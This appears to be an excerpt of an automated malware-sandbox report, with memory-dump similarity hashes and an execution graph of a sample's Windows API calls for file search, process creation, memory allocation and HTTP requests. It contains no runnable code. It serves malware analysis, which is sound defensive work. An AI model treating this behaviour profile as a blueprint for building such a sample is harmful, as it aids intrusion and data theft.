                                                                    • Opcode ID: 8ac80bd5bee61a3799dd7034c2db3c7763d09cf27ea58bc83fa09f3ea16944c6
                                                                    • Instruction ID: bb432ea77747e5003af4313a78e7015d7a22c5d5be6002f0f1156d9a1281b4d6
                                                                    • Opcode Fuzzy Hash: 8ac80bd5bee61a3799dd7034c2db3c7763d09cf27ea58bc83fa09f3ea16944c6
                                                                    • Instruction Fuzzy Hash: A0F04F71E01348AFCB04DFA9D645A9EB7F4FF58300F404069B945EB781DA74DA01CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a61036d7d1877fd790d87ba7d5be02d78ee0cd8266035901384f40882712aea1
                                                                    • Instruction ID: c3123cd4d8efd0714e42092fdf4652d1686be423f58e0e32e1e7267dbb340d23
                                                                    • Opcode Fuzzy Hash: a61036d7d1877fd790d87ba7d5be02d78ee0cd8266035901384f40882712aea1
                                                                    • Instruction Fuzzy Hash: EDF0BE70E51748ABDB04DFA9D601EAEB7B8BF14300F004858A900EB681EA38D900CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0e9f79196a72b6824230afb4fbf43cf9c5fe4c5747387a44c69621ea9afada87
                                                                    • Instruction ID: 88f100106a72b28f14e67e60b9339e51732b59ba51c511b8d2ee1c161ad4067c
                                                                    • Opcode Fuzzy Hash: 0e9f79196a72b6824230afb4fbf43cf9c5fe4c5747387a44c69621ea9afada87
                                                                    • Instruction Fuzzy Hash: FCF0BE70A50748ABCB04DFB9D651E6EB7B8AF24304F004498A900EB780EA78D900CB14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d3863c2f83a36deb936e518011781cb761ff845ba567bf7878b0ae1dd1d17a80
                                                                    • Instruction ID: d5e66bc882d9bcc92ce808c94cbc1c9bf5214047ac798850102f025c79324db8
                                                                    • Opcode Fuzzy Hash: d3863c2f83a36deb936e518011781cb761ff845ba567bf7878b0ae1dd1d17a80
                                                                    • Instruction Fuzzy Hash: 67F05E70A5074CAFDB04DFB9D555EAEB7B8AF18304F108499E501EB781DA78D901CB24
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2422b8df88972f405c7d51f91094c793a96eccc1fec108c310bf8040b4d9994e
                                                                    • Instruction ID: e29e8de6464a8888a5cfa3ac0d4e5295f276be77b5399914c6d014ade2452360
                                                                    • Opcode Fuzzy Hash: 2422b8df88972f405c7d51f91094c793a96eccc1fec108c310bf8040b4d9994e
                                                                    • Instruction Fuzzy Hash: 42F08270E55348ABDB04DBA9D655E6EB7B8AF14704F000558B901EB681EA74D901C758
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d79ca256b14c9f04938b052d714fd9484f5c8fe3c0ca6e3bb38f0fc433f2274d
                                                                    • Instruction ID: 1d8ca6b8d0976ce5b5403f6680dd866acfc9ce7744ed5e502df65570e1b67e85
                                                                    • Opcode Fuzzy Hash: d79ca256b14c9f04938b052d714fd9484f5c8fe3c0ca6e3bb38f0fc433f2274d
                                                                    • Instruction Fuzzy Hash: ABF0A071D917949FD352CB18C3C4F4377D8AB11B74F1585A1D4099BD12D378DD94C690
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d7cd63ee1d37d24eccc4a8bf75b95709831ddeea41b055dd45ac12295a48003
                                                                    • Instruction ID: ca9e1e00bfdfe0d1127c2828001f13dfb28e54ff875a9e7ce00eff91a97726f5
                                                                    • Opcode Fuzzy Hash: 1d7cd63ee1d37d24eccc4a8bf75b95709831ddeea41b055dd45ac12295a48003
                                                                    • Instruction Fuzzy Hash: CEE0C233241B10EFD7313F25DE00F4176A5FF64FA0F118A29E2810A8A987B4AC82EB44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5c0dc8907f58c26f48811acc6696b59510e00e984a7788c2092bf4f3a3cef2c4
                                                                    • Instruction ID: f56235399b9e4bd1898461724baf541072c2aee1ce73e3b012a4addae8dc8b41
                                                                    • Opcode Fuzzy Hash: 5c0dc8907f58c26f48811acc6696b59510e00e984a7788c2092bf4f3a3cef2c4
                                                                    • Instruction Fuzzy Hash: C7E0C232286314BBDB229E44CC00FA97B55EBA07A0F108031FA086AA90C675AD91E6D4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ed9afaaf02ad312b0369b3a69ace27fb2a4b76945ed25bf0ca5d4e8f0890192b
                                                                    • Instruction ID: 04e94534b0d01a0ae9dd30b969da7438f568e8230cca1ea3e1b82c2662a11a65
                                                                    • Opcode Fuzzy Hash: ed9afaaf02ad312b0369b3a69ace27fb2a4b76945ed25bf0ca5d4e8f0890192b
                                                                    • Instruction Fuzzy Hash: 6EF0C234251B80CBEB2ACF04C2E1B6173B9FB55B44F500498D8468BFA2C73AE942CA80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2285840689.00000000229B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 229B0000, based on PE: true
                                                                    • Associated: 00000009.00000002.2285840689.0000000022AD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022ADD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000009.00000002.2285840689.0000000022B4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_229b0000_wab.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                    • Instruction ID: 1068710a00a51b31f33dc87266547a285cb5f6c16873040ef7694196e026f48f
                                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                    • Instruction Fuzzy Hash: 13D0C935652F80CFD246CB08C6A0F5533ACFB44B84F8104D0E401CBB26DA2CDA40CA10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:2.9%
                                                                    Dynamic/Decrypted Code Coverage:3.8%
                                                                    Signature Coverage:3.8%
                                                                    Total number of Nodes:521
                                                                    Total number of Limit Nodes:80
                                                                    execution_graph 88201 4d454f 88202 4d455f 88201->88202 88204 4d4574 88202->88204 88205 4e8c10 88202->88205 88206 4e8c2d 88205->88206 88207 4e8c3e NtClose 88206->88207 88207->88204 88208 4562ad0 LdrInitializeThunk 88209 4cae40 88210 4cb17d 88209->88210 88212 4cb651 88210->88212 88213 4ea740 88210->88213 88214 4ea766 88213->88214 88219 4c3dc0 88214->88219 88216 4ea772 88218 4ea7a0 88216->88218 88222 4e59b0 88216->88222 88218->88212 88226 4d4650 88219->88226 88221 4c3dcd 88221->88216 88223 4e5a0a 88222->88223 88225 4e5a17 88223->88225 88250 4d3580 88223->88250 88225->88218 88227 4d4667 88226->88227 88229 4d4680 88227->88229 88230 4e9630 88227->88230 88229->88221 88232 4e9648 88230->88232 88231 4e966c 88231->88229 88232->88231 88237 4e8340 88232->88237 88238 4e835a 88237->88238 88244 4562c0a 88238->88244 88239 4e8386 88241 4eaab0 88239->88241 88247 4e8f30 88241->88247 88243 4e96d7 88243->88229 88245 4562c11 88244->88245 88246 4562c1f LdrInitializeThunk 88244->88246 88245->88239 88246->88239 88248 4e8f4d 88247->88248 88249 4e8f5e RtlFreeHeap 88248->88249 88249->88243 88251 4d35bb 88250->88251 88266 4d8c10 88251->88266 88253 4d35c3 88264 4d388f 88253->88264 88275 4eab90 88253->88275 88255 4d35d9 88256 4eab90 RtlAllocateHeap 88255->88256 88257 4d35ea 88256->88257 88258 4eab90 RtlAllocateHeap 88257->88258 88259 4d35fb 88258->88259 88265 4d368e 88259->88265 88278 4d7a10 88259->88278 88262 4d384f 88305 4d3070 88262->88305 88264->88225 88301 4d57a0 88265->88301 88267 4d8c3c 88266->88267 88268 4d8c69 88267->88268 88269 4d8c81 88267->88269 88270 4d8c74 88268->88270 88272 4e8c10 NtClose 88268->88272 88271 4d8c9d 88269->88271 88273 4e8c10 NtClose 88269->88273 88270->88253 88271->88253 88272->88270 88274 4d8c93 88273->88274 88274->88253 88321 4e8ee0 88275->88321 88277 4eabab 88277->88255 88279 4d7a35 88278->88279 88282 4d7a69 88279->88282 88339 4d72b0 88279->88339 88281 4d7b86 88281->88265 88282->88281 88324 4d7540 88282->88324 88284 4d7aff 88285 4d7b0a 88284->88285 88346 4d73c0 88284->88346 88285->88265 88288 4d7c72 88290 4d7540 3 API calls 88288->88290 88289 4e8c10 NtClose 88295 4d7bd2 88289->88295 88291 4d7c88 88290->88291 88294 4d7c8f 88291->88294 88350 4d7710 88291->88350 88293 4d7ccc 88293->88265 88294->88265 88296 4d73c0 LdrInitializeThunk 88295->88296 88297 4d7c1d 88296->88297 88298 4e8c10 NtClose 88297->88298 88299 4d7c27 88298->88299 88300 4d73c0 LdrInitializeThunk 88299->88300 88300->88288 88302 4d57c4 88301->88302 88303 4d57cb 88302->88303 88304 4d5800 LdrLoadDll 88302->88304 88303->88262 88304->88303 88307 4d308a 88305->88307 88400 4d8ee0 88305->88400 88316 4d3568 88307->88316 88404 4e1b40 88307->88404 88310 4d328b 88412 4ebcc0 88310->88412 88312 4d30e8 88312->88316 88407 4ebb90 88312->88407 88313 4d32cb 88313->88316 88318 4d1b00 LdrInitializeThunk 88313->88318 88421 4d8e80 88313->88421 88314 4d32a0 88314->88313 88418 4d1b00 88314->88418 88316->88264 88318->88313 88319 4d8e80 LdrInitializeThunk 88320 4d33fa 88319->88320 88320->88313 88320->88319 88322 4e8efd 88321->88322 88323 4e8f0e RtlAllocateHeap 88322->88323 88323->88277 88325 4d756c 88324->88325 88326 4d73c0 LdrInitializeThunk 88325->88326 88327 4d75b6 88326->88327 88331 4d7658 88327->88331 88376 4e8750 88327->88376 88329 4d764f 88330 4e8c10 NtClose 88329->88330 88330->88331 88331->88284 88332 4d75dd 88332->88329 88333 4d7664 88332->88333 88334 4e8750 LdrInitializeThunk 88332->88334 88335 4e8c10 NtClose 88333->88335 88334->88332 88336 4d766d 88335->88336 88337 4d73c0 LdrInitializeThunk 88336->88337 88338 4d768a 88336->88338 88337->88338 88338->88284 88340 4d72e3 88339->88340 88341 4d7307 88340->88341 88381 4e8800 88340->88381 88341->88282 88343 4d732a 88343->88341 88344 4e8c10 NtClose 88343->88344 88345 4d73aa 88344->88345 88345->88282 88347 4d73e5 88346->88347 88386 4e85f0 88347->88386 88351 4d7735 88350->88351 88352 4d72b0 2 API calls 88351->88352 88354 4d7765 88351->88354 88352->88354 88353 4d7a01 88353->88293 88354->88353 88356 4d73c0 LdrInitializeThunk 88354->88356 88363 4d7968 88354->88363 88355 4d73c0 LdrInitializeThunk 88357 4d79b6 88355->88357 88358 4d7891 88356->88358 88391 4d7470 88357->88391 88360 4d789c 88358->88360 88358->88363 88361 4e8c10 NtClose 88360->88361 88365 4d78a6 88361->88365 88362 4e8c10 NtClose 88362->88353 88363->88355 88364 4d79c6 88364->88362 88366 4d73c0 LdrInitializeThunk 88365->88366 88367 4d78f1 88366->88367 88368 4e8c10 NtClose 88367->88368 88369 4d78fb 88368->88369 88370 4d73c0 LdrInitializeThunk 88369->88370 88371 4d7946 88370->88371 88372 4d7470 LdrInitializeThunk 88371->88372 88373 4d7956 88372->88373 88374 4e8c10 NtClose 88373->88374 88375 4d7960 88374->88375 88375->88293 88377 4e876d 88376->88377 88380 4562ba0 LdrInitializeThunk 88377->88380 88378 4e879d 88378->88332 88380->88378 88382 4e881d 88381->88382 88385 4562ca0 LdrInitializeThunk 88382->88385 88383 4e8849 88383->88343 88385->88383 88387 4e860a 88386->88387 88390 4562c60 LdrInitializeThunk 88387->88390 88388 4d7459 88388->88288 88388->88289 88390->88388 88392 4d7496 88391->88392 88395 4e8650 88392->88395 88396 4e866a 88395->88396 88399 4563090 LdrInitializeThunk 88396->88399 88397 4d7524 88397->88364 88399->88397 88401 4d8eed 88400->88401 88402 4d8f0e SetErrorMode 88401->88402 88403 4d8f15 88401->88403 88402->88403 88403->88307 88425 4eaa20 88404->88425 88406 4e1b61 88406->88312 88408 4ebba6 88407->88408 88409 4ebba0 88407->88409 88410 4eab90 RtlAllocateHeap 88408->88410 88409->88310 88411 4ebbcc 88410->88411 88411->88310 88413 4ebc30 88412->88413 88414 4eab90 RtlAllocateHeap 88413->88414 88415 4ebc8d 88413->88415 88416 4ebc6a 88414->88416 88415->88314 88417 4eaab0 RtlFreeHeap 88416->88417 88417->88415 88432 4e8e50 88418->88432 88422 4d8e93 88421->88422 88437 4e8260 88422->88437 88424 4d8ebe 88424->88313 88428 4e8d50 88425->88428 88427 4eaa51 88427->88406 88429 4e8db9 88428->88429 88431 4e8d74 88428->88431 88430 4e8dcf NtAllocateVirtualMemory 88429->88430 88430->88427 88431->88427 88433 4e8e6d 88432->88433 88436 4562c70 LdrInitializeThunk 88433->88436 88434 4d1b22 88434->88320 88436->88434 88438 4e82b9 88437->88438 88440 4e8284 88437->88440 88442 4562dd0 LdrInitializeThunk 88438->88442 88439 4e82de 88439->88424 88440->88424 88442->88439 88443 4d6a40 88444 4d8e80 LdrInitializeThunk 88443->88444 88445 4d6a70 88444->88445 88447 4d6a9c 88445->88447 88448 4d8e00 88445->88448 88449 4d8e44 88448->88449 88450 4d8e65 88449->88450 88455 4e80b0 88449->88455 88450->88445 88452 4d8e55 88453 4d8e71 88452->88453 88454 4e8c10 NtClose 88452->88454 88453->88445 88454->88450 88456 4e80d1 88455->88456 88457 4e8106 88455->88457 88456->88452 88460 4564650 LdrInitializeThunk 88457->88460 88458 4e812b 88458->88452 88460->88458 88461 4dd1c0 88463 4dd1e9 88461->88463 88462 4dd2ed 88463->88462 88464 4dd293 FindFirstFileW 88463->88464 88464->88462 88466 4dd2ae 88464->88466 88465 4dd2d4 FindNextFileW 88465->88466 88467 4dd2e6 FindClose 88465->88467 88466->88465 88467->88462 88566 4d8300 88567 4d8318 88566->88567 88569 4d8372 88566->88569 88567->88569 88570 4dbf20 88567->88570 88572 4dbf46 88570->88572 88571 4dc15f 88571->88569 88572->88571 88597 4e8fc0 88572->88597 88574 4dbfbc 88574->88571 88575 4ebcc0 2 API calls 88574->88575 88576 4dbfd2 88575->88576 88576->88571 88577 4dc0a3 88576->88577 88578 4e8340 LdrInitializeThunk 88576->88578 88579 4d69c0 LdrInitializeThunk 88577->88579 88582 4dc0c2 88577->88582 88580 4dc02e 88578->88580 88579->88582 88580->88577 88584 4dc037 88580->88584 88581 4dc08b 88586 4d8e80 LdrInitializeThunk 88581->88586 88585 4dc147 88582->88585 88604 4e7fb0 88582->88604 88583 4dc069 88619 4e4bb0 LdrInitializeThunk 88583->88619 88584->88571 88584->88581 88584->88583 88600 4d69c0 88584->88600 88587 4d8e80 LdrInitializeThunk 88585->88587 88591 4dc099 88586->88591 88592 4dc155 88587->88592 88591->88569 88592->88569 88593 4dc11e 88609 4e8030 88593->88609 88595 4dc138 88614 4e8130 88595->88614 88598 4e8fdd 88597->88598 88599 4e8fee CreateProcessInternalW 88598->88599 88599->88574 88601 4d69d3 88600->88601 88602 4e84e0 LdrInitializeThunk 88601->88602 88603 4d69fe 88602->88603 88603->88583 88605 4e8006 88604->88605 88606 4e7fd1 88604->88606 88620 45639b0 LdrInitializeThunk 88605->88620 88606->88593 88607 4e802b 88607->88593 88610 4e8086 88609->88610 88611 4e8051 88609->88611 88621 4564340 LdrInitializeThunk 88610->88621 88611->88595 88612 4e80ab 88612->88595 88615 4e8189 88614->88615 88616 4e8154 88614->88616 88622 4562fb0 LdrInitializeThunk 88615->88622 88616->88585 88617 4e81ae 88617->88585 88619->88581 88620->88607 88621->88612 88622->88617 88623 4d1f80 88624 4d1f9a 88623->88624 88625 4d57a0 LdrLoadDll 88624->88625 88626 4d1fb8 88625->88626 88627 4d1fec PostThreadMessageW 88626->88627 88628 4d1ffd 88626->88628 88627->88628 88468 4e94c0 88469 4e94f2 88468->88469 88470 4e9516 HttpSendRequestA 88469->88470 88471 4e9531 88469->88471 88472 4e81c0 88473 4e8222 88472->88473 88474 4e81e1 88472->88474 88477 4562ee0 LdrInitializeThunk 88473->88477 88475 4e8253 88477->88475 88629 4e2500 88634 4e250f 88629->88634 88630 4e2599 88631 4e2556 88632 4eaab0 RtlFreeHeap 88631->88632 88633 4e2566 88632->88633 88634->88630 88634->88631 88635 4e2594 88634->88635 88636 4eaab0 RtlFreeHeap 88635->88636 88636->88630 88637 4e0b80 88638 4e0b9d 88637->88638 88639 4d57a0 LdrLoadDll 88638->88639 88640 4e0bbb 88639->88640 88641 4e1d01 88653 4e8ad0 88641->88653 88643 4e1d22 88644 4e1d55 88643->88644 88645 4e1d40 88643->88645 88647 4e8c10 NtClose 88644->88647 88646 4e8c10 NtClose 88645->88646 88648 4e1d49 88646->88648 88650 4e1d5e 88647->88650 88649 4e1d8a 88650->88649 88651 4eaab0 RtlFreeHeap 88650->88651 88652 4e1d7e 88651->88652 88654 4e8b42 88653->88654 88656 4e8af1 88653->88656 88655 4e8b58 NtReadFile 88654->88655 88655->88643 88656->88643 88478 4d955e 88479 4d9563 88478->88479 88480 4d9522 88479->88480 88482 4d7f80 LdrInitializeThunk LdrInitializeThunk 88479->88482 88482->88480 88657 4da995 88658 4da95a 88657->88658 88661 4da99e 88657->88661 88659 4da988 88658->88659 88660 4eaab0 RtlFreeHeap 88658->88660 88660->88659 88483 4cc950 88484 4cdfc1 88483->88484 88485 4eaa20 NtAllocateVirtualMemory 88483->88485 88485->88484 88486 4d6ad0 88487 4d6ae6 88486->88487 88488 4e8340 LdrInitializeThunk 88487->88488 88489 4d6b06 88488->88489 88492 4e8cb0 88489->88492 88491 4d6b1b 88493 4e8d12 88492->88493 88494 4e8cd1 88492->88494 88497 4562e80 LdrInitializeThunk 88493->88497 88494->88491 88495 4e8d43 88495->88491 88497->88495 88662 4e8b90 88663 4e8be2 88662->88663 88665 4e8bb1 88662->88665 88664 4e8bf8 NtDeleteFile 88663->88664 88666 4d8ba4 88667 4d8bb6 88666->88667 88672 4e83e0 88667->88672 88670 4e8c10 NtClose 88671 4d8bf6 88670->88671 88673 4e83fa 88672->88673 88676 45635c0 LdrInitializeThunk 88673->88676 88674 4d8bea 88674->88670 88676->88674 88499 4cade0 88500 4cadef 88499->88500 88501 4cae30 88500->88501 88502 4cae1d CreateThread 88500->88502 88503 4d7d60 88504 4d7d8a 88503->88504 88507 4d8cb0 88504->88507 88506 4d7db4 88508 4d8ccd 88507->88508 88514 4e8430 88508->88514 88510 4d8d1d 88511 4d8d24 88510->88511 88519 4e84e0 88510->88519 88511->88506 88513 4d8d4d 88513->88506 88515 4e849d 88514->88515 88517 4e8454 88514->88517 88524 4562f30 LdrInitializeThunk 88515->88524 88516 4e84d6 88516->88510 88517->88510 88520 4e8556 88519->88520 88521 4e8501 88519->88521 88525 4562d10 LdrInitializeThunk 88520->88525 88521->88513 88522 4e859b 88522->88513 88524->88516 88525->88522 88677 4dba20 88682 4db750 88677->88682 88679 4dba2d 88696 4db3f0 88679->88696 88681 4dba49 88683 4db775 88682->88683 88684 4db8b2 88683->88684 88707 4e37d0 88683->88707 88684->88679 88686 4db8c9 88686->88679 88688 4db8c0 88688->88686 88689 4db9b1 88688->88689 88718 4e5270 88688->88718 88723 4dae50 88688->88723 88691 4e5270 GetFileAttributesW 88689->88691 88693 4dba09 88689->88693 88732 4db1b0 88689->88732 88691->88689 88694 4eaab0 RtlFreeHeap 88693->88694 88695 4dba10 88694->88695 88695->88679 88697 4db406 88696->88697 88705 4db411 88696->88705 88698 4eab90 RtlAllocateHeap 88697->88698 88698->88705 88699 4db427 88699->88681 88700 4db71e 88701 4db737 88700->88701 88702 4eaab0 RtlFreeHeap 88700->88702 88701->88681 88702->88701 88703 4e5270 GetFileAttributesW 88703->88705 88704 4dae50 RtlFreeHeap 88704->88705 88705->88699 88705->88700 88705->88703 88705->88704 88706 4db1b0 RtlFreeHeap 88705->88706 88706->88705 88708 4e37de 88707->88708 88709 4e37e5 88707->88709 88708->88688 88710 4d57a0 LdrLoadDll 88709->88710 88711 4e381a 88710->88711 88712 4e3829 88711->88712 88736 4e32a0 LdrLoadDll 88711->88736 88714 4eab90 RtlAllocateHeap 88712->88714 88716 4e39c4 88712->88716 88717 4e3842 88714->88717 88715 4eaab0 RtlFreeHeap 88715->88716 88716->88688 88717->88715 88717->88716 88719 4e52cd 88718->88719 88720 4e5304 88719->88720 88737 4d9120 88719->88737 88720->88688 88722 4e52e6 88722->88688 88724 4dae76 88723->88724 88741 4de690 88724->88741 88726 4daedd 88727 4daefb 88726->88727 88728 4db060 88726->88728 88729 4db045 88727->88729 88746 4dad10 88727->88746 88728->88729 88730 4dad10 RtlFreeHeap 88728->88730 88729->88688 88730->88728 88733 4db1d6 88732->88733 88734 4de690 RtlFreeHeap 88733->88734 88735 4db252 88734->88735 88735->88689 88736->88712 88738 4d90ee 88737->88738 88738->88737 88739 4d9103 88738->88739 88740 4d90f8 GetFileAttributesW 88738->88740 88739->88722 88740->88739 88743 4de6a6 88741->88743 88742 4de6b0 88742->88726 88743->88742 88744 4eaab0 RtlFreeHeap 88743->88744 88745 4de6e9 88744->88745 88745->88726 88747 4dad26 88746->88747 88750 4de700 88747->88750 88749 4dae2c 88749->88727 88751 4de724 88750->88751 88751->88751 88752 4de7bc 88751->88752 88753 4eaab0 RtlFreeHeap 88751->88753 88752->88749 88753->88752 88754 4e02a0 88755 4e0304 88754->88755 88756 4d72b0 2 API calls 88755->88756 88758 4e042d 88756->88758 88757 4e0434 88758->88757 88759 4d73c0 LdrInitializeThunk 88758->88759 88761 4e04b0 88759->88761 88760 4e05d3 88761->88760 88762 4e05e2 88761->88762 88783 4e0080 88761->88783 88764 4e8c10 NtClose 88762->88764 88765 4e05ec 88764->88765 88766 4e04e5 88766->88762 88767 4e04f0 88766->88767 88768 4eab90 RtlAllocateHeap 88767->88768 88769 4e0519 88768->88769 88770 4e0538 88769->88770 88771 4e0522 88769->88771 88792 4dff70 CoInitialize 88770->88792 88772 4e8c10 NtClose 88771->88772 88774 4e052c 88772->88774 88775 4e0546 88776 4e8750 LdrInitializeThunk 88775->88776 88781 4e0564 88776->88781 88777 4e05c2 88778 4e8c10 NtClose 88777->88778 88779 4e05cc 88778->88779 88780 4eaab0 RtlFreeHeap 88779->88780 88780->88760 88781->88777 88782 4e8750 LdrInitializeThunk 88781->88782 88782->88781 88784 4e009c 88783->88784 88785 4d57a0 LdrLoadDll 88784->88785 88787 4e00ba 88785->88787 88786 4e00c3 88786->88766 88787->88786 88788 4d57a0 LdrLoadDll 88787->88788 88789 4e018e 88788->88789 88790 4d57a0 LdrLoadDll 88789->88790 88791 4e01eb 88789->88791 88790->88791 88791->88766 88793 4dffd5 88792->88793 88793->88775 88799 4e9320 88800 4e9352 88799->88800 88801 4e9376 InternetOpenA 88800->88801 88802 4e9391 88800->88802 88803 4e93a0 88804 4e93d2 88803->88804 88805 4e941d 88804->88805 88806 4e93f6 InternetConnectA 88804->88806 88812 4e89a0 88813 4e8a1a 88812->88813 88814 4e89c1 88812->88814 88815 4e8a30 NtCreateFile 88813->88815 88816 4d8130 88817 4d8141 88816->88817 88818 4d819f 88817->88818 88820 4e8c10 NtClose 88817->88820 88819 4d82c8 88818->88819 88822 4d7540 3 API calls 88818->88822 88821 4d8167 88820->88821 88824 4d7540 3 API calls 88821->88824 88823 4d82a2 88822->88823 88823->88819 88825 4d7710 4 API calls 88823->88825 88824->88818 88825->88819 88533 4ebbf0 88534 4eaab0 RtlFreeHeap 88533->88534 88535 4ebc05 88534->88535 88536 4e82f0 88537 4e830a 88536->88537 88540 4562df0 LdrInitializeThunk 88537->88540 88538 4e8332 88540->88538 88541 4e2170 88542 4e218c 88541->88542 88543 4e21c8 